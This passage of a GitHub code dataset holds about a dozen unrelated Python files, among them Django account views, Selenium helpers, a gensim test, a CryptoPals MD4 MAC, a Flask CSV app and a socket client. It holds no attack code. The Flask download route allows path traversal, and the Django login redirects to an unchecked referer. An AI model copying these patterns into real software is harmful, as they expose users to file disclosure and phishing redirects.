\"gui.png\"),\n\t\t(\"undefined\", \"keyb.png\"),\n\t\t(\"usage_setup\", \"setup.png\"),\n\t\t(\"user_interface\", \"gui.png\"),\n\t\t(\"vfd_ew\", \"setup.png\"),\n\t\t(\"vfd_ini\", \"setup.png\"),\n\t\t(\"video_clipping\", \"movie_list.png\"),\n\t\t(\"video_finetune\", \"screen.png\"),\n\t\t(\"video_menu\", \"screen.png\"),\n\t\t(\"video_setup\", \"screen.png\"),\n\t\t(\"videoenhancement_setup\", \"screen.png\"),\n\t\t(\"vmc_init_setup\", \"setup.png\"),\n\t\t(\"vmc_init_startvmc\", \"movie_list.png\"),\n\t\t(\"volume_adjust\", \"audio.png\"),\n\t\t(\"vps\", \"movie_list.png\"),\n\t\t(\"webradiofs\", \"audio.png\"),\n\t\t(\"yamp\", \"plugin.png\"),\n\t\t(\"yamp_music_player\", \"plugin.png\"),\n\t\t(\"youtube_tv\", \"plugin.png\")\n\t\t]\n\t\n\t@cached\n\tdef getText(self):\n\t\ttry:\n\t\t\tcur = self.source.current\n\t\t\tif cur and len(cur) > 2:\n\t\t\t\tselection = cur[2]\n\t\t\t\tname = self.path + selection + \".png\"\n\t\t\t\tif fileExists(name):\n\t\t\t\t\treturn name\n\t\t\t\tname = \"\"\n\t\t\t\tfor pair in self.names:\n\t\t\t\t\tif pair[0] == selection.lower():\n\t\t\t\t\t\tname = self.path + pair[1]\n\t\t\t\t\t\tif name != \"\" and fileExists(name):\n\t\t\t\t\t\t\treturn name\n\t\texcept:\n\t\t\tpass\n\t\tname = self.path + \"setup.png\"\n\t\tif fileExists(name):\n\t\t\treturn name\n\t\n\ttext = property(getText)\n","repo_name":"oerlgrey/PlatoonHD","sub_path":"usr/lib/enigma2/python/Components/Converter/PlatoonHDMenuIconPath.py","file_name":"PlatoonHDMenuIconPath.py","file_ext":"py","file_size_in_byte":7420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37530547254","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import update_session_auth_hash, authenticate\nfrom django.contrib.auth import login as auth_login, logout as auth_logout\nfrom django.contrib.auth import get_user_model\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm, CustomPasswordChangeForm, CustomAuthenticationForm\nfrom posts.models import Post\nfrom django.http import JsonResponse\nfrom schedules.models import Schedule\nimport os\nfrom django.urls import reverse_lazy\nfrom posts.models import Priority\nfrom django.db.models.functions import TruncMonth\nfrom django.db.models import Count\nfrom django.utils import timezone\nfrom django.core import serializers\nfrom django.views.generic.list import ListView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom my_messages.models import Message\n\n\n# Create your views here.\n\ndef signup(request):\n if request.user.is_authenticated:\n return redirect('posts:index')\n\n if request.method == 'POST':\n form = CustomUserCreationForm(request.POST, request.FILES)\n if form.is_valid():\n user = form.save(commit=False)\n user.address = request.POST.get('address')\n user.save()\n return redirect('accounts:login')\n else:\n form = CustomUserCreationForm()\n\n context = {\n 'form': form,\n }\n return render(request, 'accounts/signup.html', context)\n\n\ndef login(request):\n if request.user.is_authenticated:\n return redirect('main')\n\n if request.method == 'POST':\n form = CustomAuthenticationForm(request, request.POST)\n if form.is_valid():\n auth_login(request, form.get_user())\n prev_url = request.session.get('prev_url')\n if prev_url: \n del request.session['prev_url']\n return redirect(prev_url)\n return redirect('main')\n return redirect('accounts:login')\n else:\n form = CustomAuthenticationForm()\n request.session['prev_url'] = request.META.get('HTTP_REFERER')\n context = {\n 'form': form,\n }\n return render(request, 'accounts/login.html', context)\n\n\n@login_required\ndef logout(request):\n auth_logout(request)\n return redirect('main')\n \n\n@login_required\ndef delete(request):\n request.user.delete()\n return redirect('main')\n\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n form = CustomUserChangeForm(\n request.POST, request.FILES, instance=request.user)\n if form.is_valid():\n user = form.save(commit=False)\n user.address = request.POST.get('address')\n user.save()\n return redirect('accounts:profile', request.user.username)\n else:\n form = CustomUserChangeForm(instance=request.user)\n context = {\n 'form': form,\n }\n return render(request, 'accounts/update.html', context)\n\n\n@login_required\ndef change_password(request):\n if request.method == 'POST':\n form = CustomPasswordChangeForm(request.user, request.POST)\n if form.is_valid():\n user = form.save()\n update_session_auth_hash(request, user)\n return redirect('main')\n else:\n form = CustomPasswordChangeForm(request.user)\n context = {\n 'form': form,\n }\n return render(request, 'accounts/change_password.html', context)\n\n \n@login_required\ndef profile(request, username):\n User = get_user_model()\n person = User.objects.get(username=username)\n user_id = request.user.id\n like_post = person.like_posts.all()\n liked_posts = like_post.exclude(priority__user=request.user)\n # priority_range = range(1, 11)\n # priority_range2 = range(6, 11)\n priorities = Priority.objects.filter(user=request.user).order_by('priority')\n schedules = Schedule.objects.filter(user_id=user_id, start__gte=timezone.now()).order_by('start__date', 'end__date')\n messages = Message.objects.filter(receiver=request.user)\n sentmessages = Message.objects.filter(sender=request.user)\n\n context = {\n 'person': person,\n 'followings': person.followings.all(),\n 'followers': person.followers.all(),\n 'priorities': priorities,\n 'schedules': schedules,\n 'liked_posts': liked_posts,\n 'messages': messages,\n 'sentmessages': sentmessages,\n }\n\n return render(request, 'accounts/profile.html', context)\n\n\n@login_required\ndef follow(request, user_pk):\n User = get_user_model()\n person = User.objects.get(pk=user_pk)\n\n if person != request.user:\n if request.user in person.followers.all():\n person.followers.remove(request.user)\n is_followed = False\n else:\n person.followers.add(request.user)\n is_followed = True\n context = {\n 'is_followed': is_followed,\n 'followings_count': person.followings.count(),\n 'followers_count': person.followers.count(),\n }\n return JsonResponse(context)\n return redirect('accounts:profile', person.username)\n\n\n@login_required\ndef following_list(request, username):\n User = get_user_model()\n person = User.objects.get(username=username)\n followings = person.followings.all()\n context = {\n 'followings': followings,\n }\n return render(request, 'accounts/following_list.html', context)\n\n\n@login_required\ndef followers_list(request, username):\n User = get_user_model()\n person = User.objects.get(username=username)\n followers = person.followers.all()\n context = {\n 'followers': followers,\n }\n return render(request, 'accounts/followers_list.html', context)\n\ndef priority_list(request, username):\n user_id = request.user.id\n User = get_user_model()\n person = User.objects.get(username=username)\n priorities = Priority.objects.filter(user=person).order_by('priority')\n data = []\n for priority in priorities:\n post_data = serializers.serialize('python', [priority.post])[0]\n post = post_data['fields']\n post['pk'] = post_data['pk']\n data.append({'post': post})\n return JsonResponse(data, safe=False)\n","repo_name":"Camping-PJT/2nd","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17241633896","text":"import time\nimport logging\n\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import StaleElementReferenceException, \\\n ElementNotInteractableException, ElementClickInterceptedException\n\nfrom lib.wait_utils import BroweserWait\n\nlog = logging.getLogger(__name__)\n\nclass Portal:\n \"\"\" This file contains custome function for send_keys, click \"\"\"\n\n def __init__(self, browser):\n self.browser = browser\n\n def get_wait(self, element=None):\n return BroweserWait(self.browser, element)\n\n def click(self, locator):\n attempts = 5\n while attempts != 0:\n try:\n element = self.get_wait(locator).wait_for_clickable()\n element.click()\n time.sleep(2)\n break\n except (StaleElementReferenceException, \\\n ElementClickInterceptedException, ElementNotInteractableException):\n time.sleep(2)\n attempts = attempts - 1\n log.info(f'{locator} element became stale, {attempts} attempts remaining')\n\n def send_text(self, locator, value):\n self.get_wait(locator).wait_for_clickable()\n self.browser.find_element(*locator).send_keys(Keys.CONTROL + 'a')\n self.browser.find_element(*locator).send_keys(Keys.DELETE)\n self.browser.find_element(*locator).send_keys(value)\n\n def is_element_present(self, element):\n try:\n self.browser.find_element(*element)\n return True\n except NoSuchElementException:\n return False\n\n\n","repo_name":"nithyaudhaya/cypress-realworld-automation","sub_path":"pages/portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28520357354","text":"import logging\nimport unittest\n\nfrom gensim.topic_coherence import probability_estimation\nfrom gensim.corpora.hashdictionary import HashDictionary\n\nclass TestProbabilityEstimation(unittest.TestCase):\n def setUp(self):\n self.texts = [['human', 'interface', 'computer'],\n ['eps', 'user', 'interface', 'system'],\n ['system', 'human', 'system', 'eps'],\n ['user', 'response', 'time'],\n ['trees'],\n ['graph', 'trees']]\n self.dictionary = HashDictionary(self.texts)\n # Following is the mapping:\n # {'computer': 10608,\n # 'eps': 31049,\n # 'graph': 18451,\n # 'human': 31002,\n # 'interface': 12466,\n # 'response': 5232,\n # 'system': 5798,\n # 'time': 29104,\n # 'trees': 23844,\n # 'user': 12736}\n self.corpus = [self.dictionary.doc2bow(text) for text in self.texts]\n # Suppose the segmented topics from s_one_pre are:\n self.segmented_topics = [[(5798, 18451), (10608, 18451), (10608, 5798)], [(10608, 18451), (12736, 18451), (12736, 10608)]]\n\n def testPBooleanDocument(self):\n \"\"\"Test p_boolean_document()\"\"\"\n # Unique topic ids are 5798, 10608, 12736 and 18451\n obtained, _ = probability_estimation.p_boolean_document(self.corpus, self.segmented_topics)\n expected = {18451: set([5]), 12736: set([1, 3]), 5798: set([1, 2]), 10608: set([0])}\n self.assertTrue(obtained == expected)\n\n def testPBooleanSlidingWindow(self):\n \"\"\"Test p_boolean_sliding_window()\"\"\"\n # Test with window size as 2. window_id is zero indexed.\n obtained, _ = probability_estimation.p_boolean_sliding_window(self.texts, self.segmented_topics, self.dictionary, 2)\n expected = {10608: set([1]), 12736: set([8, 2, 3]), 18451: set([11]), 5798: set([4, 5, 6, 7])}\n self.assertTrue(obtained == expected)\n\nif __name__ == '__main__':\n logging.root.setLevel(logging.WARNING)\n unittest.main()\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/gensim/test/test_probability_estimation.py","file_name":"test_probability_estimation.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"70172133867","text":"import hashlib\n\n\ndef MD4MAC(ipBytes, key):\n md4Input = key+ipBytes\n hashAlgo = hashlib.new('md4')\n hashAlgo.update(md4Input)\n mac = hashAlgo.digest()\n return mac\n\n\ndef main():\n key = bytes(''.encode('latin1'))\n mac = MD4MAC(key, key)\n print(mac.hex())\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"D-setia/CryptoPals","sub_path":"set4/chall_30/implementMD4keyedMAC.py","file_name":"implementMD4keyedMAC.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1843412089","text":"from setuptools import setup, find_packages\nfrom typing import List\nimport os\nfrom typing import List, Optional\n\nimport torch\nfrom torch.utils.cpp_extension import CUDA_HOME, BuildExtension, CUDAExtension, CppExtension\n\ndef get_existing_ccbin(nvcc_args: List[str]) -> Optional[str]:\n \"\"\"\n Given a list of nvcc arguments, return the compiler if specified.\n\n Note from CUDA doc: Single value options and list options must have\n arguments, which must follow the name of the option itself by either\n one of more spaces or an equals character.\n \"\"\"\n last_arg = None\n for arg in reversed(nvcc_args):\n if arg == \"-ccbin\":\n return last_arg\n if arg.startswith(\"-ccbin=\"):\n return arg[7:]\n last_arg = arg\n return None\n\nextra_compile_args = {\"cxx\": [\"-std=c++14\"]}\ndefine_macros = []\n\nforce_cuda = os.getenv(\"FORCE_CUDA\", \"0\") == \"1\"\nif (torch.cuda.is_available() and CUDA_HOME is not None) or force_cuda:\n extension = CUDAExtension\n # sources += source_cuda\n define_macros += [(\"WITH_CUDA\", None)]\n nvcc_args = [\n \"-DCUDA_HAS_FP16=1\",\n \"-D__CUDA_NO_HALF_OPERATORS__\",\n \"-D__CUDA_NO_HALF_CONVERSIONS__\",\n \"-D__CUDA_NO_HALF2_OPERATORS__\",\n ]\n nvcc_flags_env = os.getenv(\"NVCC_FLAGS\", \"\")\n if nvcc_flags_env != \"\":\n nvcc_args.extend(nvcc_flags_env.split(\" \"))\n\n # It's better if pytorch can do this by default ..\n # CC = os.environ.get(\"CC\", None)\n # if CC is not None:\n # CC_arg = \"-ccbin={}\".format(CC)\n # if CC_arg not in nvcc_args:\n # if any(arg.startswith(\"-ccbin\") for arg in nvcc_args):\n # raise ValueError(\"Inconsistent ccbins\")\n # nvcc_args.append(CC_arg)\n\n \n CC = os.environ.get(\"CC\", None)\n if CC is not None:\n existing_CC = get_existing_ccbin(nvcc_args)\n if existing_CC is None:\n CC_arg = \"-ccbin={}\".format(CC)\n nvcc_args.append(CC_arg)\n elif existing_CC != CC:\n msg = f\"Inconsistent ccbins: {CC} and {existing_CC}\"\n raise ValueError(msg)\n\n extra_compile_args[\"nvcc\"] = nvcc_args\nelse:\n print('Cuda is not available!')\n\n\next_modules = [\n CUDAExtension('rasterizer._C', [\n 'rasterizer/csrc/ext.cpp',\n 'rasterizer/csrc/rasterize_points.cu',\n 'rasterizer/csrc/rasterize_points_cpu.cpp'\n ],\n include_dirs=['rasterizer/csrc'],\n define_macros=define_macros,\n extra_compile_args=extra_compile_args\n )\n]\n\n\nsetup(\n name='pytorch-rasterizer',\n version='0.1',\n ext_modules=ext_modules,\n cmdclass={'build_ext': BuildExtension}\n)\n","repo_name":"yizhangphd/FreqPCR","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"38426234027","text":"\"\"\"\nNAME\n warm_up\n\nDESCRIPTION\n Provides the possibility to pre-train models.\n\"\"\"\n\nimport torch\nimport globals.constants as const\n\n\ndef warm_up(model, lr, n_epochs):\n \"\"\"\n Does pure data warm-up training.\n Uses the Mean Squared Error as loss function.\n Does not track any metrics or parameters.\n\n Parameter:\n model: pytorch model\n lr: learning rate\n n_epochs: number of epochs\n\n Returns:\n model: warmed-up model\n \"\"\"\n\n # Loss function\n loss = torch.nn.MSELoss()\n\n # Send loss to GPU if possible\n # If cuda GPU available the models would already be there\n if const.cuda:\n loss.cuda()\n\n # Optimizers\n optimizer = torch.optim.Adam(model.parameters(), lr, betas=(0.5, 0.999))\n\n # ==============================\n # Warm up training\n # ==============================\n\n for epoch in range(n_epochs):\n for st_train, U_train in const.dataloader_train:\n\n optimizer.zero_grad()\n\n # Predict\n predictions = model(st_train)\n\n # Loss of predictions\n data_loss = loss(predictions, U_train)\n\n # Optimize model\n data_loss.backward()\n optimizer.step()\n\n return model\n","repo_name":"marcus-muenzer/Neural-Network-Reconstruction-of-higher-dimensional-Plasma-Space-Time","sub_path":"src/training/warm_up.py","file_name":"warm_up.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25460697550","text":"import base64\nimport csv\nfrom io import StringIO\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom src import crud\nfrom src.models.category import CategoryCreate\nfrom src.models.transaction import TransactionCreate\n\n\nasync def parser(db: AsyncSession, *, mapping: dict, file: str, user_id: int, account_id: int, budget_id: int) -> bool:\n # mapping example {\"Date\": \"date\", \"Description\": \"desc\", \"Amount\": \"amnt\"}\n # mapping example with category {\"Date\": \"date\", \"Description\": \"desc\", \"Amount\": \"amnt\", \"Category\": \"category\"}\n\n # Example Header row from a csv file\n # Transaction Date,Clear Date,Description,Category,Amount,Current Balance\n\n filterData = await crud.filter.get_all_filters_for_user(db, user_id=user_id, limit=-1)\n if filterData is not None:\n filters = filterData[\"paginated_results\"]\n else:\n filters = None\n categoryData = await crud.category.get_all_categories_for_user(db, user_id=user_id, limit=-1)\n if categoryData is not None:\n categories = categoryData[\"paginated_results\"]\n else:\n categories = None\n default_category = await crud.category.get_unsorted_category_for_budget(db, user_id=user_id, budget_id=budget_id)\n if default_category:\n default_category_id = default_category.id\n else:\n categoryCreate = CategoryCreate(name=\"Unsorted\", desc=\"Created when uploading a file\", amount=-1)\n new_category = await crud.category.create(db, obj_in=categoryCreate, user_id=user_id, budget_id=budget_id)\n default_category_id = new_category.id\n\n decoded_data = base64.b64decode(file.split(\",\")[1])\n lines = decoded_data.decode(\"utf-8\")\n\n csvfile = StringIO(lines)\n csvreader = csv.reader(csvfile)\n file_lines = iter(csvreader)\n header_row = next(file_lines)\n indexes = {}\n # to figure out column mapping\n for col in header_row:\n if col in mapping:\n index = header_row.index(col)\n indexes[index] = mapping[col]\n # indexes example value {0: \"date\", 2: \"desc\", 4: \"amnt\"}\n has_categories = False\n if \"category\" in indexes.values():\n has_categories = True\n\n for row in csvreader:\n # row example = 3/11/2023,3/12/2023,THIS IS A DESCRIPTION,3000,Food,1000000\n split_row = row\n new_transaction = {}\n for index, column_name in indexes.items():\n try:\n new_transaction[column_name] = split_row[index]\n except IndexError:\n # this most likely means that the csv file is not formatted correctly\n return False\n category_id = None\n if has_categories and new_transaction[\"category\"] is not None:\n if categories is not None and isinstance(categories, list):\n for category in categories:\n if category.name.lower() == new_transaction[\"category\"].lower():\n category_id = category.id\n break\n\n if category_id is None and new_transaction[\"category\"] is not None and new_transaction[\"category\"] != \"\":\n categoryCreate = CategoryCreate(\n name=new_transaction[\"category\"], desc=\"Created when uploading a file\", amount=-1\n )\n new_category = await crud.category.create(\n db, obj_in=categoryCreate, user_id=user_id, budget_id=budget_id\n )\n categoryData = await crud.category.get_all_categories_for_user(db, user_id=user_id)\n if categoryData is not None:\n categories = categoryData[\"paginated_results\"]\n category_id = new_category.id\n\n # new_transaction {\"date\": \"3/11/2023\", \"desc\": \"THIS IS A DESCRIPTION\", \"amnt\": \"3000\"}\n if filters is not None and type(filters) == list:\n for filter in filters:\n if filter.filter_by.lower() in new_transaction[\"desc\"].lower():\n category_id = filter.category_id\n break\n\n if category_id is None:\n category_id = default_category_id\n\n transaction_create = TransactionCreate(\n amount=float(new_transaction[\"amnt\"]), desc=new_transaction[\"desc\"], date=new_transaction[\"date\"]\n )\n\n await crud.transaction.create(\n db,\n obj_in=transaction_create,\n user_id=user_id,\n category_id=category_id,\n account_id=account_id,\n budget_id=budget_id,\n )\n\n return True\n","repo_name":"NADEE-MJ/peppermint","sub_path":"backend/src/core/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5570310409","text":"import numpy as np\nimport os.path as osp\nfrom itertools import product as product\nfrom math import sqrt as sqrt\nfrom pathlib import Path\nimport xml.etree.ElementTree as ET\n\n\nimport torch.utils.data as data\nimport torch\nimport cv2\n\nfrom .transforms import *\n\nclass Anno_xml2list(object):\n def __init__(self, classes):\n self.classes = classes\n\n def __call__(self, xml_path, width, height):\n ret = []\n xml = ET.parse(xml_path).getroot()\n for obj in xml.iter('object'):\n difficult = int(obj.find('difficult').text)\n if difficult == 1:\n continue\n\n bndbox = []\n\n name = obj.find('name').text.lower().strip() # 物体名\n bbox = obj.find('bndbox') # バウンディングボックスの情報\n\n pts = ['xmin', 'ymin', 'xmax', 'ymax']\n for pt in (pts):\n cur_pixel = int(bbox.find(pt).text) - 1\n if pt == 'xmin' or pt == 'xmax': # x方向のときは幅で割算\n cur_pixel /= width\n else: # y方向のときは高さで割算\n cur_pixel /= height\n\n bndbox.append(cur_pixel)\n\n label_idx = self.classes.index(name)\n bndbox.append(label_idx)\n\n ret += [bndbox]\n\n return np.array(ret) # [[xmin, ymin, xmax, ymax, label_ind], ... ]\n\ndef od_collate_fn(batch):\n targets = []\n imgs = []\n for sample in batch:\n imgs.append(sample[0]) # sample[0] は画像imgです\n targets.append(torch.FloatTensor(sample[1])) # sample[1] はアノテーションgtです\n\n imgs = torch.stack(imgs, dim=0)\n\n return imgs, targets\n\n\n\nclass DataTransform():\n def __init__(self, input_size, params):\n self.data_transform = {\n 'train': Compose([\n ConvertFromInts(), # intをfloat32に変換\n ToAbsoluteCoords(), # アノテーションデータの規格化を戻す\n PhotometricDistort(), # 画像の色調などをランダムに変化\n Expand(params[\"color_mean\"]), # 画像のキャンバスを広げる\n RandomSampleCrop(), # 画像内の部分をランダムに抜き出す\n RandomVerticalFlip(p=0.5), # 追加で実装した物\n #RandomHorizontalFlip(p=0.5), # 追加で実装した物\n ToPercentCoords(), # アノテーションデータを0-1に規格化\n Resize(input_size), # 画像サイズをinput_size×input_sizeに変形\n SubtractMeans(params[\"color_mean\"]) # BGRの色の平均値を引き算\n ]),\n 'val': Compose([\n ConvertFromInts(), # intをfloatに変換\n Resize(input_size), # 画像サイズをinput_size×input_sizeに変形\n SubtractMeans(params[\"color_mean\"]) # BGRの色の平均値を引き算\n ])\n }\n\n def __call__(self, img, phase, boxes, labels):\n return self.data_transform[phase](img, boxes, labels)\n\n\nclass TrainDataset(data.Dataset):\n def __init__(self, img_list, anno_list, phase, transform, transform_anno):\n self.img_list = img_list\n self.anno_list = anno_list\n self.phase = phase # train もしくは valを指定\n self.transform = transform # 画像の変形\n self.transform_anno = transform_anno # アノテーションデータをxmlからリストへ\n\n def __len__(self):\n return len(self.img_list)\n\n def __getitem__(self, index):\n im, gt, h, w = self.pull_item(index)\n return im, gt\n\n def pull_item(self, index):\n image_file_path = self.img_list[index]\n img = cv2.imread(image_file_path) # [高さ][幅][色BGR]\n height, width, channels = img.shape # 画像のサイズを取得\n\n anno_file_path = self.anno_list[index]\n anno_list = self.transform_anno(anno_file_path, width, height) #np.array([[xmin, ymin, xmax, ymax, label], [...]]\n\n img, boxes, labels = self.transform(img, self.phase, anno_list[:, :4], anno_list[:, 4])\n img = torch.from_numpy(img[:, :, (2, 1, 0)]).permute(2, 0, 1)\n gt = np.hstack((boxes, np.expand_dims(labels, axis=1)))\n return img, gt, height, width\n\nclass TestDataset(data.Dataset):\n def __init__(self, img_list, phase, transform):\n self.img_list = img_list\n self.phase = phase # train もしくは valを指定\n self.transform = transform # 画像の変形\n\n def __len__(self):\n return len(self.img_list)\n\n def __getitem__(self, index):\n im = self.pull_item(index)\n return im\n\n def pull_item(self, index):\n image_file_path = self.img_list[index]\n img = cv2.imread(image_file_path) # [高さ][幅][色BGR]\n height, width, channels = img.shape # 画像のサイズを取得\n anno_list = np.array([0, 1, 2, 3, 4]).reshape(1, 5) # ダミーデータ\n\n img, boxes, labels = self.transform(img, self.phase, [], anno_list[:, 4])\n img = torch.from_numpy(img[:, :, (2, 1, 0)]).permute(2, 0, 1)\n return img\n\ndef get_dataloader(dataset, batch_size, num_workers, shuffle, drop_last, collate_fn=None):\n dataloader = data.DataLoader(\n dataset=dataset,\n batch_size=batch_size,\n num_workers=num_workers,\n shuffle=shuffle,\n collate_fn=collate_fn,\n drop_last=drop_last,\n )\n return dataloader\n\nclass OneTestDataset(data.Dataset):\n def __init__(self, img, phase, transform):\n self.img = img\n self.phase = phase\n self.transform = transform # 画像の変形\n\n def __len__(self):\n return 1\n\n def __getitem__(self, index):\n im = self.pull_item(index)\n return im\n\n def pull_item(self, index):\n height, width, channels = self.img.shape # 画像のサイズを取得\n anno_list = np.array([0, 1, 2, 3, 4]).reshape(1, 5) # ダミーデータ\n\n img, boxes, labels = self.transform(self.img, self.phase, [], anno_list[:, 4])\n img = torch.from_numpy(img[:, :, (2, 1, 0)]).permute(2, 0, 1)\n return img","repo_name":"mitsuhiko-nozawa/SSD_Application","sub_path":"src/libs/dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":6164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4347315203","text":"import socket\nimport time\n\n\nclass ClientError:\n pass\n\n\nclass Client:\n def __init__(self, host, port, timeout):\n self.sock = socket.create_connection((host, port), timeout=timeout)\n\n def put(self, key, value, timestamp=None):\n send_time = timestamp\n if not send_time:\n send_time = int(time.time())\n\n send_string = \"put \" + key + \" \" + str(value) + \" \" + str(send_time) + \"\\n\"\n self.sock.sendall(send_string.encode(\"utf8\"))\n raw_data = self.sock.recv(1024).decode(\"utf8\")\n# print(raw_data) #debug\n# raw_data = 'ok\\n\\n' #debug\n\n if raw_data == 'error\\nwrong command\\n\\n':\n raise ClientError\n if not raw_data == 'ok\\n\\n':\n# print(\"WTF\") #debug\n raise ClientError\n\n def get(self, key):\n self.sock.sendall((\"get \" + key + \"\\n\").encode(\"utf8\"))\n raw_data = self.sock.recv(1024)\n raw_data = raw_data.decode(\"utf8\")\n# raw_data = 'ok\\n\\n' #debug\n if raw_data == 'ok\\n\\n':\n return {}\n elif not raw_data[:2] == 'ok':\n# print(\"NOT STARTS WITH OK\") #debug\n raise ClientError\n elif not raw_data[-2:] == '\\n\\n':\n# print(\"NOT FINISHES WITH LFLF\") #debug\n raise ClientError\n else:\n data = raw_data.split('\\n')[1:-2]\n\n ans = dict()\n for current_data in data:\n data_split = current_data.split(' ')\n\n key = data_split[0]\n metric = float(data_split[1])\n timestamp = int(data_split[2])\n\n if key in ans.keys():\n ans[key].append((timestamp, metric))\n else:\n ans[key] = [(timestamp, metric)]\n\n return ans\n\n\nif __name__ == '__main__':\n test_server = False\n\n if test_server:\n client = Client(\"127.0.0.1\", 10001, timeout=15)\n\n client.put(\"palm.cpu\", 0.5, timestamp=1150864247)\n client.put(\"palm.cpu\", 2.0, timestamp=1150864248)\n client.put(\"palm.cpu\", 0.5, timestamp=1150864248)\n\n client.put(\"eardrum.cpu\", 3, timestamp=1150864250)\n client.put(\"eardrum.cpu\", 4, timestamp=1150864251)\n client.put(\"eardrum.memory\", 4200000)\n","repo_name":"Niira/Coursera-Programming-in-Python","sub_path":"1 - Diving in Python/Week 5/Tasks/1 - Client/Solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6052151282","text":"print('-=' * 10)\r\nprint('LISTA DE VALORES')\r\nprint('-=' * 10)\r\nlista = []\r\nwhile True:\r\n n = int(input('Digite um valor: '))\r\n if n in lista:\r\n print('este valor já está na lista.')\r\n else:\r\n lista.append(n)\r\n continuar = str(input('Você quer continuar? [S/N] ')).strip().upper()[0]\r\n if continuar == 'N':\r\n break\r\nlista.sort()\r\nprint('-=' * 10)\r\nprint(f'A lista que você digitou contém os seguintes valores {lista}')\r\n","repo_name":"thiagovilar07/Python-exercises","sub_path":"ex079.py","file_name":"ex079.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19238649542","text":"import os\nfrom flask import Flask, render_template, request, redirect, session, send_file\nfrom datetime import datetime\nfrom MainFunc import create_dataset\n\napp = Flask(__name__)\napp.secret_key = os.urandom(16) #secret key for sessions\n\n\n\n#home page route\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n searchterm = request.form[\"searchterm\"]\n create_dataset(searchterm)\n \n return render_template('home.html', search_term=searchterm)\n\n return render_template('home.html')\n\n\n@app.route('/download/')\ndef download():\n file_names = []\n dir_path = 'outputs'\n for filename in sorted(os.listdir(dir_path)):\n if filename.endswith('csv'):\n file_names.append([filename,datetime.strptime(filename.replace('.csv', '').split('__')[1],\"%d-%m-%Y-%H-%M\")])\n\n file_names = sorted(file_names, key=lambda x: x[1], reverse=True)\n\n\n return render_template('download.html', file_names=file_names)\n\n@app.route('/download/')\ndef downloadFile(filename):\n#load all of the available csv files, sorting by newer. and add a download button\n path = 'outputs/'+filename\n return send_file(path, as_attachment=True)\n\n\n \n","repo_name":"OmarAlsouly/SILC_App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71295637546","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport pymysql\nimport time\n\ndef scrollToElement(eleId):\n\tglobal driver\n\tdriver.execute_script('var element = document.getElementById(\"'+eleId+'\");element.scrollIntoView({block: \"end\"});')\n\telement = WebDriverWait(driver, 10).until(\n \tEC.visibility_of_element_located((By.ID, eleId))\n\t)\n\ndef getBillLinks():\n\tglobal driver\n\tribbonbills = driver.find_elements_by_class_name(\"ribbonbill\")\n\tfor bill in ribbonbills:\n\t\tanchor = bill.find_element_by_tag_name('a')\n\t\tbillLinks.append(anchor.get_attribute('href'))\n\t\tprint(\"URL Acquired: %s\" % (anchor.get_attribute('href')))\n\ndef getVoteCount(url):\n\thtml = urlopen(url)\n\tbsObj = BeautifulSoup(html, \"html.parser\")\n\n\ttable = bsObj.find(\"table\",{\"id\":\"ctl00_ContentPlaceHolder1_dlVoteMember\"})\n\n\tnamesHTML = table.findAll(\"span\",{\"class\":\"text\"})\n\tvotesHTML = table.findAll(\"span\",{\"class\":\"textBold\"})\n\n\tnames = []\n\tvotes = []\n\n\tfor name in namesHTML:\n\t\tnames.append(name.getText())\n\n\tfor vote in votesHTML:\n\t\tvotes.append(vote.getText())\n\n\tnameVotes = dict(zip(names, votes))\n\n\tchanges = bsObj.find(\"div\",{\"id\":\"ctl00_ContentPlaceHolder1_RollCallHistDIV\"}).table\n\tchangeRows = changes.findAll(\"tr\")\n\tchange = \"\"\n\tfor row in changeRows:\n\t\tif row.attrs['colspan'] == \"1\":\n\t\t\tif row.td.span.getText() == \"Yeas\" or row.td.span.getText() == 